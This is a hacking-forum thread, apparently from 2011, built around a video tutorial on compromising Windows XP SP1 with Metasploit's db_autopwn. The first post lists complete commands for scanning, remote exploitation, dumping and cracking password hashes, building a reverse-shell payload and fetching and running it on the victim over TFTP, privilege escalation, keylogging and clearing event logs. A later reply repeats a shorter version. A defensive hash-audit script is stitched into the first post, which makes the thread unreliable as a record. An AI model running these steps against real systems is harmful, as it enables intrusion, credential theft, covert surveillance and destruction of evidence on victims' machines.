Thread: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

  1. #1
    g0tmi1k (Moderator) - Join Date: Feb 2010 - Posts: 1,771

    [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4644349/
    Download video: http://www.mediafire.com/?cyxtis1ymly84f5


    What is this?
    This guide shows how to set up PostgreSQL as the database to power metasploit, which then leads on to using metasploit's db_autopwn features to carry out a collection of remote exploits in an attempt to gain access to the target system(s). When/if access has been gained, it shows a few basic things afterwards, such as:

    • Gathering information – OS, interfaces, privilege level, running processes, idle time, screenshots and keylogging
    • Cracking user's passwords – Finding passwords to access the system
    • Gaining shell access – Then transferring meterpreter agent via TFTP
    • Handling multiple sessions – Which vulnerability to interact with.
    • Process migration – Move code into another process
    • Privilege escalation - Attempt to gain SYSTEM level privileges.
    • File management – Navigation, Down/Up-load, editing, viewing files/folders
    • Program control – Execution and Killing programs
    • Misc – Covering tracks and Power management




    Guide

    • Configure PostgreSQL database to be able to function with metasploit
    • Set up metasploit to use PostgreSQL and how to connect automatically at startup
    • Use nmap from metasploit to scan for target(s)
    • Running db_autopwn to attempt to run a collection of remote exploit(s) on discovered target(s) (The two exploits which work were: windows/smb/ms04_011_lsass and windows/dcerpc/ms03_026_dcom)
    • Dump the hash table, then by using John The Ripper break password(s)
    • Using an alternative method rather than meterpreter to transfer files, TFTP (Useful if you only have shell access and wish to use the meterpreter shell instead OR interact with another system)
    • Migrating to a different process which hides the backdoor from running process lists (makes the injection less obvious and allows the backdoor to be deleted if needed. Plus if the service that was exploited didn't have interactive access to the desktop, it now would)
    • Escalate Privilege which allows the attacker to gain more control over the system.
    • Various commands to navigate through the file system as well as altering the file structure.
    • Basic commands to collect information about the system & user.




    What do I need?

    • PostgreSQL – (Can be found on BackTrack 4-R2)
    • Metasploit – (Can be found on BackTrack 4-R2)
    • Nmap – (Can be found on BackTrack 4-R2)
    • TFTPD – (Can be found on BackTrack 4-R2)
    • Text Editor – (Kate can be found on BackTrack 4-R2)




    Commands:
    Code:
    /etc/init.d/postgresql-8.3 start
    /etc/init.d/postgresql-8.3 status
    passwd -d postgres
    su postgres
    psql
    ALTER USER postgres WITH PASSWORD 'g0tmi1k';
    \q
    passwd
    psql -l
    createdb msf
    psql -l
    exit
    clear
    
    msfconsole
    db_driver
    db_driver postgresql
    db_connect postgres:g0tmi1k@127.0.0.1/msf
    exit
    
    kate ~/.msf3/msfconsole.rc
    db_driver postgresql
    db_connect postgres:g0tmi1k@127.0.0.1/msf
    db_workspace -a msf
    clear
    
    msfconsole
    db_hosts
    db_nmap -O -sS -sV -v 192.168.0.100-110   #192.168.0.0/24 -A
    db_hosts
    db_autopwn -t -p -e -b #db_autopwn -t -x -e -r -T 30
    clear
    
    sessions -l -v
    sessions -i 1
    sysinfo
    ipconfig
    getuid
    hashdump
    
    kate -> paste -> Save: ~/hashdump
    cd /pentest/passwords/jtr/
    ./john ~/hashdump
    clear
    
    start-tftpd
    cd /tmp
    ifconfig
    msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.33 X > g0tmi1k.exe
    ls
    
    background
    clear
    
    search handler
    use multi/handler
    show options
    exploit -j
    sessions -i 1
    shell
    cd C:\
    tftp -i 192.168.0.105 GET g0tmi1k.exe
    g0tmi1k.exe
    exit
    
    sessions -l -v
    sessions -i 3
    getuid
    ps
    migrate [Explorer.EXE]
    getuid
    getsystem #getprivs if not enabled, migrate if that fails - and try again
    getuid
    pwd
    cd C:/
    ls
    mkdir g0tmi1k
    ls
    cd g0tmi1k
    ls
    pwd
    getwd
    lpwd
    
    echo have you... > /tmp/message.txt
    
    upload /tmp/message.txt C:/g0tmi1k/
    ls
    edit message.txt
    A -> g0tmi1k? -> esc -> :wq
    cat C:/g0tmi1k/message.txt
    download message.txt /tmp/
    execute -f notepad -a message.txt
    del message.txt
    ls
    cd \
    ls
    rmdir g0tmi1k
    ls
    ps
    kill [notepad]
    idletime
    screenshot
    run keylogrecorder
    
    mail.google.com thisismyusername thisismypassword
    
    clearev
    shutdown
    exit
    
    kate -> open -> /path/to/key/logger/file/which/

    Notes:

    • I had deleted postgres's password before recording the video. This is the reason why it didn't prompt me for "(Current) UNIX password:". The solution would be to type "passwd -d postgres" before "su postgres". The commands have been updated to reflect this.
    • Metasploit can do A LOT more – this is a brief insight to it
    • db_autopwn may not work on your chosen target - Target in the video is running Windows XP SP1
    • db_autopwn is “noisy” as it tries a mass of exploits.
    • Windows XP by default has a TFTP client built into it, Windows 7 doesn't.



    Song: Luke Solomon – Liquid & Bungalove - Saturday Song
    Video length: 10:28
    Capture length: 25:01
    Last edited by g0tmi1k; 03-05-2011 at 01:10 PM.
    Have you...g0tmi1k?
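    The first post dumps the SAM with hashdump and hands the result to John the Ripper. Seen from the defender's side the same dump is an audit input: hashdump prints one account per line as user:RID:LM-hash:NT-hash:::, and a real LM hash (anything other than the fixed empty-LM value aad3b435b51404eeaad3b435b51404ee) means the host still stores LM hashes, which are upper-cased, cut into two 7-character halves and cracked in minutes, while the empty-NT value 31d6cfe0d16ae931b73c59d7e0c089c0 means a blank password. The Python script below is an added example, not code from the thread or from Metasploit; the dump lines it parses are constructed sample data, and the account names in them are made up.

```python
"""Audit a Metasploit hashdump / pwdump-format dump for weak credential storage.

Added example; not code from the thread or from Metasploit.
Input format (one account per line): user:RID:LM-hash:NT-hash:::
"""
import re
from dataclasses import dataclass

# LM hash of the empty string; also what hashdump shows when LM storage is disabled.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
# NT hash of the empty string, i.e. the account has a blank password.
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user : numeric RID : 32 hex LM : 32 hex NT : three trailing empty fields
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Constructed sample dump (hash values are sample data, not real accounts).
SAMPLE_DUMP = """
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
g0tmi1k:1003:aad3b435b51404eeaad3b435b51404ee:4a9b6fd9d2e6f5bd3ef0d4e3b7c6a5d4:::
"""


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text):
    """Parse hashdump output; raise ValueError on a line that is not in the format."""
    accounts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        user, rid, lm, nt = m.groups()
        accounts.append(Account(user, int(rid), lm.lower(), nt.lower()))
    return accounts


def audit(accounts):
    """Return {user: [issue, ...]}; an empty list means nothing was flagged."""
    findings = {}
    for a in accounts:
        issues = []
        if a.nt == NT_EMPTY:
            issues.append("blank password")
        elif a.lm != LM_EMPTY:
            # A stored LM hash caps the effective password at 14 case-insensitive
            # characters split into two independently crackable 7-character halves.
            issues.append("LM hash stored (password <= 14 chars, trivially crackable)")
        if a.rid == 500:
            issues.append("built-in Administrator (RID 500), prime target for cracking")
        findings[a.user] = issues
    return findings


def report(findings):
    """Render the audit as text lines, one per account."""
    lines = []
    for user, issues in findings.items():
        status = "; ".join(issues) if issues else "ok"
        lines.append(f"{user}: {status}")
    return lines


if __name__ == "__main__":
    for line in report(audit(parse_hashdump(SAMPLE_DUMP))):
        print(line)
```

    Accounts flagged with "LM hash stored" are the ones John would recover first; the fix is to stop storing LM hashes (the "Do not store LAN Manager hash value on next password change" security policy, NoLMHash) and to rotate the affected passwords, since the hash is only dropped at the next password change.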

  2. #2
    m4jh0l (Just burned his ISO) - Join Date: Feb 2010 - Posts: 18

    Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Great video man, nice work too, keep it on.

  3. #3
    m0j4h3d (Member) - Join Date: Jan 2010 - Posts: 84

    Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Nice work man.. XP systems are still being used nowadays.. but I prefer facing Win7...
    btw nice work boy
    go fw
    ---> 3v3RY D4y P4ss3S 1 f0uNd N3W th1NGs <---
    Knowing how 2 use BT dsnt mean that u r hacker

  4. #4
    pusherman (Just burned his ISO) - Join Date: Dec 2010 - Posts: 1

    Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Thanks for the tutorial.

  5. #5
    MartinBishop (Member) - Join Date: May 2010 - Location: Frankfurt/Main - Posts: 58

    Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    I found by chance a similar video, but with SP3, dunno if it's interesting...

    http://www.youtube.com/watch?v=dKLWvGWA-Ow

    From the Description Box:

    How to own a Windows XP SP3 Box with Metasploit / Backtrack.

    Tutorial: Metasploit DB Autopwning

    Commands:

    /etc/init.d/postgresql-8.3 start # start the database
    msfconsole # start metasploit
    db_connect pentest # connect to database
    db_nmap HOST IP/ HOSTNAME # Scan for open Ports
    db_autopwn -e -p # -e = All matched Targets, -p = Select Attacks based on open Ports

    Wait until a Meterpreter Session, like:

    [*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)

    Wait until the Attack is over or Ctrl+C to Terminate the Attack.

    Now:

    sessions # shows your connections to the victim
    sessions -i 1 # you join session 1
    shell # opens reverse shell on victim

    Use the help function, to get information about other available commands.

    FOR EDUCATIONAL PURPOSES ONLY
    Last edited by MartinBishop; 03-01-2011 at 11:34 AM. Reason: add the text

  6. #6
    g0tmi1k (Moderator) - Join Date: Feb 2010 - Posts: 1,771

    Re: [Video] Owning Windows (XP SP1 vs. Metasploit's db_AutoPWN)

    Quote Originally Posted by m4jh0l:
    Great video man, nice work too, keep it on.
    Quote Originally Posted by pusherman:
    Thanks for the tutorial.
    Thanks for the feedback



    Quote Originally Posted by m0j4h3d:
    Nice work man.. XP systems are still being used nowadays.. but I prefer facing Win7...
    btw nice work boy
    go fw
    Yes they are, however, XP SP1 is "rare".
    I do plan to get to Windows 7 - just want to do a few OSs/SPs between then tho



    Quote Originally Posted by MartinBishop:
    I found by chance a similar video, but with SP3, dunno if it's interesting...

    http://www.youtube.com/watch?v=dKLWvGWA-Ow

    From the Description Box:
    Thanks for sharing. I've had a quick look at the video and on the target's machine, they have got VNC installed...
    In my demos it is a fresh install of the OS and SP, without any other software installed, using the default values. I'm not sure what exploit was used to create the session(s).

    I am soon recording my take on XP SP3.
    Have you...g0tmi1k?
